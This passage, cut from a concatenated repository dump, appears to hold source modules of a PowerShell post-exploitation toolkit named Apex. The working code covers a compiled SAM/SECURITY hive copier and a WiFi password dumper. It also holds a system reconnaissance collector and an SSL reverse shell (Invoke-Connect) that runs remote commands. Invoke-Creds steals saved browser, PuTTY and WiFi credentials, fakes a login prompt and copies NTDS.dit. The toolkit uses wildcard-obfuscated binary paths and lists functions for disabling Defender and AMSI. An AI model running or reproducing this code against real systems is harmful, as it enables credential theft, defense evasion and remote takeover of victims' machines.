System.Management.Automation; 141 | using System; 142 | using System.IO; 143 | 144 | namespace $Z 145 | { 146 | class $Z 147 | { 148 | static void Main(string[] args) 149 | { 150 | using (PowerShell $X = PowerShell.Create().AddScript(@" 151 | `$class = [WMICLASS]'root\cimv2:win32_shadowcopy' 152 | `$class.create('C:\', 'ClientAccessible') 153 | `$DeviceObjectName = (Get-WmiObject win32_shadowcopy | select -ExpandProperty DeviceObject -Last 1) 154 | `$ShadowCopyID = (Get-WmiObject win32_shadowcopy | select -ExpandProperty ID | select -Last 1) 155 | (C:\\windows\\system32\\cmd.exe /c copy `$DeviceObjectName\windows\system32\config\SYSTEM `$env:temp\SYSTEM) 156 | (C:\\windows\\system32\\cmd.exe /c copy `$DeviceObjectName\windows\system32\config\SECURITY `$env:temp\SECURITY) 157 | (C:\\windows\\system32\\cmd.exe /c copy `$DeviceObjectName\windows\system32\config\SAM `$env:temp\SAM) 158 | (C:\\windows\\system32\\vssadmin.exe delete shadows /Shadow=`$ShadowCopyID /quiet)")) 159 | { 160 | Collection Output = $X.Invoke(); 161 | } 162 | Environment.CurrentDirectory = Environment.GetEnvironmentVariable("temp"); 163 | DirectoryInfo dir = new DirectoryInfo("."); 164 | Console.WriteLine("[+] SYSTEM, SAM and SECURITY files saved to " + dir.FullName); 165 | } 166 | } 167 | } 168 | "@ 169 | 170 | New-Item "$env:temp\$Z.cs" -ItemType File >$null 2>&1 171 | Add-Content $CsFile $Source 172 | Start-Process -Wi Hidden -FilePath $Compiler -ArgumentList $CompilerArgs 173 | Sleep 4 174 | Remove-Item $env:temp\$Z.cs 175 | Write "`n [+] Assembly --> $env:temp\CopySAM.exe`n" 176 | } 177 | elseif ($WiFiCreds) { 178 | 179 | $CompilerArgs = "/r:$SmaDll /t:exe /out:$env:temp\WiFiCreds.exe $CsFile" 180 | 181 | $Source = @" 182 | using System.Collections.ObjectModel; 183 | using System.Management.Automation; 184 | using System; 185 | using System.IO; 186 | 187 | namespace $Z 188 | { 189 | class $Z 190 | { 191 | static void Main(string[] args) 192 | { 193 | using (PowerShell $X = PowerShell.Create().AddScript(@" 194 | (C:\windows\system32\netsh.exe wlan show profiles) | Select-String ""\:(.+)`$"" | %{`$name=`$_.Matches.Groups[1].Value.Trim(); `$_} | %{(netsh wlan show profile name=""`$name"" key=clear)} | Select-String ""Key Content\W+\:(.+)`$"" | %{`$pass=`$_.Matches.Groups[1].Value.Trim(); `$_} | %{[PSCustomObject]@{ ""Wireless Profile""=`$name;""Password""=`$pass }} | Format-Table -AutoSize | Out-File C:\windows\temp\$Z")) 195 | { 196 | Collection Output = $X.Invoke(); 197 | } 198 | // Console.WriteLine("WiFi Credentials saved to C:\\windows\\temp\\$Z"); 199 | string text = System.IO.File.ReadAllText(@"C:\\windows\\temp\\$Z"); 200 | System.Console.WriteLine("{0}", text); 201 | // System.Console.ReadLine(); 202 | System.IO.File.Delete("C:\\windows\\temp\\$Z"); 203 | } 204 | } 205 | } 206 | "@ 207 | 208 | New-Item "$env:temp\$Z.cs" -ItemType File >$null 2>&1 209 | Add-Content $CsFile $Source 210 | Start-Process -Wi Hidden -FilePath $Compiler -ArgumentList $CompilerArgs 211 | Sleep 4 212 | Remove-Item $env:temp\$Z.cs 213 | Write "`n [+] Assembly --> $env:temp\WiFiCreds.exe`n" 214 | } 215 | elseif ($SysInfo) { 216 | 217 | $CompilerArgs = "/r:$SmaDll /t:exe /out:$env:temp\SysInfo.exe $CsFile" 218 | 219 | $Source = @" 220 | using System.Collections.ObjectModel; 221 | using System.Management.Automation; 222 | using System; 223 | using System.IO; 224 | 225 | namespace $Z 226 | { 227 | class $Z 228 | { 229 | static void Main(string[] args) 230 | { 231 | using (PowerShell $X = PowerShell.Create().AddScript(@" 232 | 233 | Write-Output ""`n--- OS Information: ---"" | Out-File C:\windows\temp\SysInfo.txt 234 | (get-wmiobject win32_operatingsystem | Select-Object Caption, Version, OSArchitecture, ServicePackMajorVersion, ServicePackMinorVersion, MUILanguages, LastBootUpTime, LocalDateTime, NumberOfUsers, SystemDirectory | Out-File -Append C:\windows\temp\SysInfo.txt) 235 | 236 | Write-Output ""`n--- Environment: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 237 | (Get-ChildItem Env: | ft Key,Value | Out-File -Append C:\windows\temp\SysInfo.txt) 238 | 239 | Write-Output ""`n--- Architecture: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 240 | (Get-WmiObject -Query ""SELECT * FROM Win32_Processor WHERE AddressWidth='64'"" | Out-File -Append C:\windows\temp\SysInfo.txt) 241 | 242 | Write-Output ""`n--- Users: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 243 | (Get-WmiObject -Class Win32_UserAccount -Filter ""LocalAccount='True'"" | select name, fullname | Out-File -Append C:\windows\temp\SysInfo.txt) 244 | 245 | Write-Output ""`n--- Local Admins: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 246 | (C:\??*?\*3?\n?t.?x? localgroup Administrators | Out-File -Append C:\windows\temp\SysInfo.txt) 247 | 248 | Write-Output ""`n--- Domain Admins: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 249 | (C:\??*?\*3?\n?t.?x? group 'Domain Admins' /domain | Out-File -Append C:\windows\temp\SysInfo.txt) 250 | 251 | Write-Output ""`n--- Privileges: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 252 | (C:\??*?\*3?\wh??m?.?x? /priv | Out-File -Append C:\windows\temp\SysInfo.txt) 253 | 254 | Write-Output ""`n--- HotFixes: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 255 | (Get-Hotfix | Sort-Object -Descending | Out-File -Append C:\windows\temp\SysInfo.txt) 256 | 257 | Write-Output ""`n--- Check Elevated: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 258 | `$check = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ""S-1-5-32-544"") 259 | if (`$check -eq `$true) { 260 | 261 | Write-Output "" [+] We're running as an elevated process."" | Out-File -Append C:\windows\temp\SysInfo.txt 262 | 263 | } 264 | if (`$check -eq `$false) { 265 | 266 | Write-Output "" [-] Not Elevated."" | Out-File -Append C:\windows\temp\SysInfo.txt 267 | } 268 | 269 | Write-Output ""`n--- Shares/Drives: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 270 | (Get-WmiObject Win32_Share | Out-File -Append C:\windows\temp\SysInfo.txt) 271 | 272 | Write-Output ""`n--- Logged On: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 273 | `$Explorer = (Get-WmiObject -Query ""select * from Win32_Process where Name='explorer.exe'"") 274 | 275 | if (!`$Explorer) { 276 | 277 | Write "" [-] No users currently interactively logged on."" | Out-File -Append C:\windows\temp\SysInfo.txt 278 | 279 | } 280 | else { 281 | foreach (`$p in `$Explorer) { 282 | `$Username = `$p.GetOwner().User 283 | `$Domain = `$p.GetOwner().Domain 284 | 285 | Write "" User: `$Domain\`$Username`n Logon Time: `$(`$p.ConvertToDateTime(`$p.CreationDate))"" | Out-File -Append C:\windows\temp\SysInfo.txt 286 | 287 | } 288 | } 289 | 290 | Write-Output ""`n--- Installed Applications: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 291 | (Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | Format-Table Parent,Name,LastWriteTime | Out-File -Append C:\windows\temp\SysInfo.txt) 292 | 293 | Write-Output ""`n--- Processes: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 294 | (Get-WmiObject -Query 'Select * from Win32_Process' | where {`$_.Name -notlike 'svchost*'} | Select Name, Handle, @{Label='Owner';Expression={`$_.GetOwner().User}} | Format-Table -AutoSize | Out-File -Append C:\windows\temp\SysInfo.txt) 295 | 296 | Write-Output ""`n--- Services: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 297 | (Get-WmiObject win32_service | Select-Object Name, DisplayName, @{Name=""Path""; Expression={`$_.PathName.split('""')[1]}}, State | Format-List | Out-File -Append C:\windows\temp\SysInfo.txt) 298 | 299 | Write-Output ""`n--- Tasks: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 300 | (Get-ChildItem C:\windows\system32\tasks |fl -Property Name,FullName | Out-File -Append C:\windows\temp\SysInfo.txt) 301 | 302 | Write-Output ""`n--- Installed AV: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 303 | [parameter(ValueFromPipeline=`$true, ValueFromPipelineByPropertyName=`$true)] 304 | [Alias('name')] 305 | `$computername=`$env:computername 306 | `$AntiVirusProducts = Get-WmiObject -Namespace ""root\SecurityCenter2"" -Class AntiVirusProduct -ComputerName `$computername 307 | 308 | `$ret = @() 309 | foreach(`$AntiVirusProduct in `$AntiVirusProducts){ 310 | switch (`$AntiVirusProduct.productState) { 311 | ""262144"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Disabled""} 312 | ""262160"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Disabled""} 313 | ""266240"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Enabled""} 314 | ""266256"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Enabled""} 315 | ""393216"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Disabled""} 316 | ""393232"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Disabled""} 317 | ""393488"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Disabled""} 318 | ""397312"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Enabled""} 319 | ""397328"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Enabled""} 320 | ""397584"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Enabled""} 321 | default {`$defstatus = ""Unknown"" ;`$rtstatus = ""Unknown""} 322 | } 323 | `$ht = @{} 324 | `$ht.Computername = `$computername 325 | `$ht.Name = `$AntiVirusProduct.displayName 326 | `$ht.'Product GUID' = `$AntiVirusProduct.instanceGuid 327 | `$ht.'Product Executable' = `$AntiVirusProduct.pathToSignedProductExe 328 | `$ht.'Reporting Exe' = `$AntiVirusProduct.pathToSignedReportingExe 329 | `$ht.'Definition Status' = `$defstatus 330 | `$ht.'Real-time Protection Status' = `$rtstatus 331 | 332 | `$ret += New-Object -TypeName PSObject -Property `$ht 333 | } 334 | `$ret | Out-File -Append C:\windows\temp\SysInfo.txt 335 | 336 | Write-Output ""`n--- Local Client DNS Cache: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 337 | if (`$PSVersionTable.PSVersion.Major -eq ""2"") { 338 | 339 | Write "" [!] This function requires PowerShell version greater than 2.0."" | Out-File -Append C:\windows\temp\SysInfo.txt 340 | 341 | return 342 | } 343 | else { 344 | (Get-DnsClientCache | Out-File -Append C:\windows\temp\SysInfo.txt) 345 | } 346 | 347 | Write-Output ""`n--- PowerShell ConsoleHost History: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 348 | (Get-Content ""`$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"" | Out-File -Append C:\windows\temp\SysInfo.txt) 349 | 350 | Write-Output ""`n--- Recent Documents: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 351 | (Get-ChildItem `$env:appdata\Microsoft\Windows\Recent\ | Out-File -Append C:\windows\temp\SysInfo.txt) 352 | 353 | Write-Output ""`n--- Network Interfaces: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 354 | (ipconfig /all | Out-File -Append C:\windows\temp\SysInfo.txt) 355 | 356 | Write-Output ""`n--- Network Connections: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 357 | (netstat -an | Out-File -Append C:\windows\temp\SysInfo.txt) 358 | 359 | ")) 360 | { 361 | Collection Output = $X.Invoke(); 362 | } 363 | string text = System.IO.File.ReadAllText(@"C:\\windows\\temp\\SysInfo.txt"); 364 | // System.Console.WriteLine("{0}", text); 365 | Console.WriteLine("SysInfo saved to C:\\windows\\temp\\SysInfo.txt"); 366 | // System.Console.ReadLine(); 367 | // System.IO.File.Delete("C:\\windows\\temp\\$Z"); 368 | } 369 | } 370 | } 371 | "@ 372 | 373 | New-Item "$env:temp\$Z.cs" -ItemType File >$null 2>&1 374 | Add-Content $CsFile $Source 375 | Start-Process -Wi Hidden -FilePath $Compiler -ArgumentList $CompilerArgs 376 | Sleep 4 377 | Remove-Item $env:temp\$Z.cs 378 | Write "`n [+] Assembly --> $env:temp\SysInfo.exe`n" 379 | } 380 | } -------------------------------------------------------------------------------- /modules/Invoke-Connect.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Connect { 2 | <# 3 | 4 | .SYNOPSIS 5 | Transfers all Apex functionality to a remote SSL listener, and also functions as a non-interactive powershell reverse "shell" if invoked as a stand-alone cmdlet. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER ListenerIp 14 | The Listener IP Address. 15 | 16 | .PARAMETER ListenerPort 17 | The Listener Port. 18 | 19 | .EXAMPLE 20 | PS> Invoke-Connect -ListenerIp 192.168.1.1 -ListenerPort 443 21 | 22 | .NOTES 23 | Author: Fabrizio Siciliano (@0rbz_) 24 | 25 | #> 26 | 27 | [CmdletBinding()] 28 | param( 29 | [Parameter(Position=1)] 30 | [Switch]$Help, 31 | [Switch]$List, 32 | 33 | [Parameter(Position=0,Mandatory = $False)] 34 | [string]$ListenerIp, 35 | 36 | [Parameter(Position=1,Mandatory = $False)] 37 | [string]$ListenerPort 38 | ) 39 | 40 | if ($Help -or $List) { 41 | Write @" 42 | 43 | ### Invoke-Connect Help ### 44 | --------------------------- 45 | Available Invoke-Connect Commands: 46 | ---------------------------------- 47 | |--------------------------------------------------------------------------------| 48 | | [-ListenerIp] listener_ip [-ListenerPort] listener_port | 49 | |--------------------------------------------------------------------------------| 50 | 51 | [*] Description: Transfers all Apex functionality to a remote SSL listener, and 52 | also functions as a non-interactive powershell reverse "shell" if invoked as 53 | a stand-alone cmdlet. 54 | 55 | (SSL-enabled listener is required) 56 | 57 | [*] Usage: Invoke-Connect -ListenerIp 192.168.1.1 -ListenerPort 443 58 | 59 | [*] Mitre ATT&CK Ref: T1086 (PowerShell) 60 | [*] Mitre ATT&CK Ref: T1043 (Commonly Used Port) 61 | [*] Mitre ATT&CK Ref: T1352 (C2 Protocol Development) 62 | 63 | \--------------------------------------------------------------------------------/ 64 | 65 | "@ 66 | } 67 | elseif ($ListenerIp -and $ListenerPort) { 68 | if ($PSVersionTable.PSVersion.Major -eq "2") { 69 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 70 | return 71 | } 72 | else { 73 | # https://stackoverflow.com/questions/11581914/converting-ip-address-to-hex 74 | 75 | # Use a hex-ified listener IP address for C2 comms 76 | $ListenerIp = "$ListenerIp" 77 | $ar = $ListenerIp.Split('.') 78 | $Octet1 = "{0:X2}" -f [int]$ar[0] 79 | $Octet2 = "{0:X2}" -f [int]$ar[1] 80 | $Octet3 = "{0:X2}" -f [int]$ar[2] 81 | $Octet4 = "{0:X2}" -f [int]$ar[3] 82 | $Hexip = "0x"+$Octet1 + $Octet2 + $Octet3 + $Octet4 83 | 84 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 85 | 86 | $socket = New-Object System.Net.Sockets.TCPClient($Hexip,$ListenerPort) 87 | $stream = $socket.GetStream() 88 | $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) 89 | 90 | $sslStream.AuthenticateAsClient($Hexip) 91 | 92 | [byte[]]$bytes = 0..65535|%{0} 93 | while(($x = $sslStream.Read($bytes,0,$bytes.Length)) -ne 0) { 94 | $data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$x) 95 | $flow = (Invoke-Expression $data | Out-String) + '[' + (Test-Connection -ComputerName $env:computername -count 1).IPV4Address.ipaddressTOstring +']'+'['+$env:username+'@'+$env:computername+']> ' 96 | $flow2 = ([text.encoding]::ASCII).GetBytes($flow) 97 | $sslStream.Write($flow2,0,$flow2.Length) 98 | $sslStream.Flush() 99 | } 100 | } 101 | } 102 | } 103 | 104 | -------------------------------------------------------------------------------- /modules/Invoke-Creds.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Creds { 2 | <# 3 | 4 | .SYNOPSIS 5 | Several methods for obtaining credentials from the target system. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER WifiCreds 14 | Dumps saved WiFi Credentials. 15 | 16 | .PARAMETER IeCreds 17 | Dumps saved Internet Explorer/Edge Credentials. 18 | 19 | .PARAMETER AuthPrompt 20 | Invokes an authentication prompt to the target and captures any entered credentials. 21 | 22 | .PARAMETER PuttyKeys 23 | Dumps any saved putty sessions/keys/passwords. 24 | 25 | .PARAMETER CopySAM 26 | Utilizes Volume Shadow Copy to copy the SAM, SYSTEM and SECURITY files from C:\windows\system32\config. These can be parsed offline. 27 | 28 | .PARAMETER CopyNtds 29 | Utilizes Volume Shadow Copy to copy the NTDS.dit and SYSTEM files. These files can be parsed offline. 30 | 31 | .EXAMPLE 32 | PS> Invoke-Creds -WifiCreds 33 | 34 | .EXAMPLE 35 | PS> Invoke-Creds -PuttyKeys 36 | 37 | .EXAMPLE 38 | PS> Invoke-Creds -CopySAM -Dest C:\temp\ 39 | 40 | .NOTES 41 | Author: Fabrizio Siciliano (@0rbz_) 42 | 43 | #> 44 | 45 | [CmdletBinding()] 46 | param ( 47 | [Parameter(Position=1)] 48 | [Switch]$Help, 49 | [Switch]$List, 50 | 51 | [Parameter(Mandatory = $False)] 52 | [Switch]$WifiCreds, 53 | 54 | [Parameter(Mandatory = $False)] 55 | [Switch]$IeCreds, 56 | 57 | [Parameter(Mandatory = $False)] 58 | [Switch]$AuthPrompt, 59 | 60 | [Parameter(Mandatory = $False)] 61 | [Switch]$PuttyKeys, 62 | 63 | [Parameter(Mandatory = $False)] 64 | [Switch]$CopySAM, 65 | [String]$Dest, 66 | 67 | [Parameter(Mandatory = $False)] 68 | [Switch]$CopyNtds, 69 | [String]$Dest2=$Dest 70 | ) 71 | 72 | if ($Help -eq $True) { 73 | Write @" 74 | 75 | ### Invoke-Creds Help ### 76 | -------------------------------- 77 | Available Invoke-Creds Commands: 78 | -------------------------------- 79 | |---------------------------------------------------------------------| 80 | | -WiFiCreds | 81 | |---------------------------------------------------------------------| 82 | 83 | [*] Description: Dumps saved WiFi Credentials. 84 | 85 | [*] Usage: Invoke-Creds -WiFiCreds 86 | 87 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 88 | 89 | |---------------------------------------------------------------------| 90 | | -IeCreds | 91 | |---------------------------------------------------------------------| 92 | 93 | [*] Description: Dumps saved Internet Explorer/Edge Credentials. 94 | 95 | [*] Usage: Invoke-Creds -IeCreds 96 | 97 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 98 | 99 | |---------------------------------------------------------------------| 100 | | -AuthPrompt | 101 | |---------------------------------------------------------------------| 102 | 103 | [*] Description: Invokes an authentication prompt to the target 104 | and captures any entered credentials. 105 | 106 | [*] Usage: Invoke-Creds -AuthPrompt 107 | 108 | [*] Mitre ATT&CK Ref: T1056 (Input Capture) 109 | 110 | |---------------------------------------------------------------------| 111 | | -PuttyKeys | 112 | |---------------------------------------------------------------------| 113 | 114 | [*] Description: Dumps any saved putty sessions/keys/passwords. 115 | 116 | [*] Usage: Invoke-Creds -PuttyKeys 117 | 118 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 119 | 120 | |---------------------------------------------------------------------| 121 | | -CopySAM [-Dest] dest | 122 | |---------------------------------------------------------------------| 123 | 124 | [*] Description: Utilizes Volume Shadow Copy to copy the SAM, SYSTEM 125 | and SECURITY files from C:\windows\system32\config. These can be 126 | parsed offline. 127 | 128 | [*] Usage: Invoke-Creds -CopySAM -Dest C:\temp\ 129 | 130 | [*] Mitre ATT&CK Ref: T1003 (Credential Dumping) 131 | 132 | |---------------------------------------------------------------------| 133 | | -CopyNtds [-Dest] dest | 134 | |---------------------------------------------------------------------| 135 | 136 | [*] Description: Utilizes Volume Shadow Copy to copy the NTDS.dit 137 | and SYSTEM files. These files can be parsed offline. 138 | 139 | [*] Usage: Invoke-Creds -CopyNtds -Dest C:\temp\ 140 | 141 | [*] Mitre ATT&CK Ref: T1003 (Credential Dumping) 142 | 143 | \---------------------------------------------------------------------/ 144 | 145 | "@ 146 | } 147 | elseif ($List -eq $True) { 148 | Write @" 149 | 150 | Invoke-Creds Brief Command Usage: 151 | --------------------------------- 152 | Invoke-Creds -WiFiCreds 153 | Invoke-Creds -IeCreds 154 | Invoke-Creds -AuthPrompt 155 | Invoke-Creds -PuttyKeys 156 | Invoke-Creds -CopySAM -Dest C:\temp 157 | Invoke-Creds -CopyNtds -Dest C:\temp 158 | 159 | "@ 160 | } 161 | elseif ($WifiCreds) { 162 | 163 | # check for PS version in the event this is invoked from a stand-alone cmdlet 164 | if ($PSVersionTable.PSVersion.Major -eq "2") { 165 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 166 | return 167 | } 168 | else { 169 | # https://jocha.se/blog/tech/display-all-saved-wifi-passwords 170 | (C:\??*?\*3?\ne?s?.e?e wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ "Wireless Profile"=$name;"Password"=$pass }} | Format-Table -AutoSize 171 | } 172 | } 173 | elseif ($IeCreds) { 174 | # check for PS version in the event this is invoked from a stand-alone cmdlet 175 | if ($PSVersionTable.PSVersion.Major -eq "2") { 176 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 177 | return 178 | } 179 | else { 180 | # https://www.toddklindt.com/blog/_layouts/mobile/dispform.aspx?List=56f96349-3bb6-4087-94f4-7f95ff4ca81f&ID=606 181 | [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] 182 | $vault = New-Object Windows.Security.Credentials.PasswordVault 183 | $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | Format-List 184 | } 185 | } 186 | elseif ($AuthPrompt) { 187 | $c = Get-Credential 188 | $u = $c.GetNetworkCredential().username 189 | $p = $c.GetNetworkCredential().password 190 | 191 | Write "Username: $u" 192 | Write "Password: $p" 193 | } 194 | elseif ($PuttyKeys) { 195 | # check for PS version in the event this is invoked from a stand-alone cmdlet 196 | if ($PSVersionTable.PSVersion.Major -eq "2") { 197 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 198 | return 199 | } 200 | else { 201 | $SavedSessions = (Get-Item HKCU:\Software\SimonTatham\PuTTY\Sessions\*).Name | ForEach-Object { $_.split("\")[5]} 202 | 203 | foreach ($Session in $SavedSessions) { 204 | $HostName = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).Hostname 205 | $PrivateKey = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).PublicKeyFile 206 | $Username = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).UserName 207 | $ProxyHost = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyHost 208 | $ProxyPassword = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyPassword 209 | $ProxyPort = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyPort 210 | $ProxyUsername = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyUsername 211 | $Results = "`nSession Name: $Session`nHostname/IP: $HostName`nUserName: $UserName`nPrivate Key: $PrivateKey`nProxy Host: $ProxyHost`nProxy Port: $ProxyPort`nProxy Username: $ProxyUsername`nProxy Password: $ProxyPassword" 212 | 213 | Write $Results 214 | } 215 | } 216 | } 217 | elseif ($CopySAM -and $Dest) { 218 | # https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/create-method-in-class-win32-shadowcopy 219 | 220 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 221 | -match "S-1-5-32-544")) -and $(Test-Path "C:\windows\system32\config\SAM")) { 222 | 223 | # create shadow copy 224 | $class = [WMICLASS]"root\cimv2:win32_shadowcopy" 225 | $class.create("C:\", "ClientAccessible") 226 | 227 | # get the Device object name and Shadow Copy ID. 228 | $DeviceObjectName = (Get-WmiObject win32_shadowcopy | select -ExpandProperty DeviceObject -Last 1) 229 | $ShadowCopyID = (Get-WmiObject win32_shadowcopy | select -ExpandProperty ID | select -Last 1) 230 | 231 | # copy SYSTEM 232 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SYSTEM $Dest) 233 | 234 | # copy SECURITY 235 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SECURITY $Dest) 236 | 237 | # copy SAM 238 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SAM $Dest) 239 | 240 | # delete the shadow copy we created 241 | (C:\??*?\*3?\v?*a?mi?.?x? delete shadows /Shadow=$ShadowCopyID /quiet) 242 | } 243 | elseif (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544"))) { 244 | Write "`n [!] This process requires elevation. Make sure you're admin first.`n" 245 | } 246 | else { 247 | Write "`n [!] Can't find SAM file.`n" 248 | } 249 | } 250 | elseif ($CopyNtds -and $Dest) { 251 | 252 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) -and $(Test-Path "C:\windows\NTDS\NTDS.dit")) { 253 | # create shadow copy 254 | $class = [WMICLASS]"root\cimv2:win32_shadowcopy" 255 | $class.create("C:\", "ClientAccessible") 256 | 257 | # get the Device object name and Shadow Copy ID. 258 | $DeviceObjectName = (Get-WmiObject win32_shadowcopy | select -ExpandProperty DeviceObject -Last 1) 259 | $ShadowCopyID = (Get-WmiObject win32_shadowcopy | select -ExpandProperty ID | select -Last 1) 260 | 261 | # copy NTDS 262 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\NTDS\NTDS.dit $Dest) 263 | 264 | # copy SYSTEM 265 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SYSTEM $Dest) 266 | 267 | # delete the shadow copy we created 268 | (C:\??*?\*3?\v?*a?mi?.?x? delete shadows /Shadow=$ShadowCopyID /quiet) 269 | } 270 | elseif (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544"))) { 271 | Write "`n [!] This process requires elevation. Make sure you're admin first.`n" 272 | } 273 | else { 274 | Write "`n [!] Can't find NTDS.dit file.`n" 275 | } 276 | } 277 | } 278 | 279 | -------------------------------------------------------------------------------- /modules/Invoke-DefenderTools.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-DefenderTools { 2 | <# 3 | 4 | .SYNOPSIS 5 | Several functions to aid in interacting with Windows Defender. 6 | 7 | .PARAMETER Help 8 | Shows detailed help for each function. 9 | 10 | .PARAMETER List 11 | Shows summary list of available functions. 12 | 13 | .PARAMETER GetExcludes 14 | Gets any current exclude files/paths/extensions currently configured in Windows Defender via the Registry. 15 | 16 | .PARAMETER AddExclude 17 | Adds a path exclude to Windows Defender. (Requires Elevation) 18 | 19 | .PARAMETER DisableRtm 20 | Description: Disables Windows Defender Real-Time Monitoring. (Requires Elevation) 21 | 22 | .PARAMETER DisableAMSI 23 | Disables PowerShell's AMSI Hook 24 | 25 | .EXAMPLE 26 | PS> Invoke-DefenderTools -GetExcludes 27 | 28 | .EXAMPLE 29 | PS> Invoke-DefenderTools -AddExclude 30 | 31 | .EXAMPLE 32 | PS> Invoke-DefenderTools -DisableRtm 33 | 34 | .EXAMPLE 35 | PS> Invoke-DefenderTools -DisableAmsi 36 | 37 | .NOTES 38 | Author: Fabrizio Siciliano (@0rbz_) 39 | 40 | #> 41 | [CmdletBinding()] 42 | param ( 43 | [Parameter(Position=1)] 44 | [Switch]$Help, 45 | [Switch]$List, 46 | 47 | [Parameter(Mandatory = $False)] 48 | [Switch]$GetExcludes, 49 | 50 | [Parameter(Mandatory = $False)] 51 | [Switch]$AddExclude, 52 | [string]$Path, 53 | 54 | [Parameter(Mandatory = $False)] 55 | [Switch]$DisableRtm, 56 | 57 | [Parameter(Mandatory = $False)] 58 | [Switch]$DisableAmsi 59 | ) 60 | 61 | if ($Help -eq $True) { 62 | Write @" 63 | 64 | ### Invoke-DefenderTools Help ### 65 | --------------------------------- 66 | Available Invoke-DefenderTools Commands: 67 | ---------------------------------------- 68 | |----------------------------------------------------------------------| 69 | | -GetExcludes | 70 | |----------------------------------------------------------------------| 71 | 72 | [*] Description: Gets any current exclude files/paths/extensions 73 | currently configured in Windows Defender via the Registry. 74 | 75 | [*] Usage: Invoke-DefenderTools -GetExcludes 76 | 77 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 78 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 79 | 80 | |----------------------------------------------------------------------| 81 | | -AddExclude [-Path] path | 82 | |----------------------------------------------------------------------| 83 | 84 | [*] Description: Adds a path exclude to Windows Defender. 85 | (Requires Elevation) 86 | 87 | [*] Usage: Invoke-DefenderTools -AddExclude -Path C:\temp 88 | 89 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 90 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 91 | 92 | 